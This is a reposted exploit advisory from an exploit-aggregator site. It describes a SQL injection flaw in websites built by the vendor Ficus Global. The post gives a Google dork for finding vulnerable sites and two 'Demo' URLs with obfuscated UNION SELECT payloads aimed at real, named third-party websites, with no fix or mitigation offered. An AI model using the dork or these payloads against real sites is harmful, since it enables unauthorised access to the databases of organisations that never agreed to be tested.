Ficus Global - Sql Injection Vulnerability
CVE |
Category |
Price |
Severity |
CVE-XXXX-XXXX |
CWE-89 |
Unknown |
High |
Author |
Risk |
Exploitation Type |
Date |
Unknown |
High |
Remote |
2021-09-11 |
CPE |
cpe:cpe:/a:ficus:global |
CVSS vector description
Metric |
Value |
Metric Description |
Value Description |
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090072
Below is a copy:
Ficus Global - Sql Injection Vulnerability*********************************************************
#Exploit Title: Ficus Global - Sql Injection Vulnerability
#Date: 2021-09-10
#Exploit Author: Behrouz Mansoori
#Google Dork: Designed & Maintained by Ficus Global"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed & Maintained by Ficus Global"
### Demo :
https://vvmranchi.edu.in/gallery-image.php?id=18&&year=-2019%20/*!12345union*/%20select%20111,222,333,444,version(),666,777,888--
https://www.urc.ac.in/gallery.php?id=5&&year=-2020%20/*!12345union*/%20select%201,2,3,4,version(),6,7,8--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.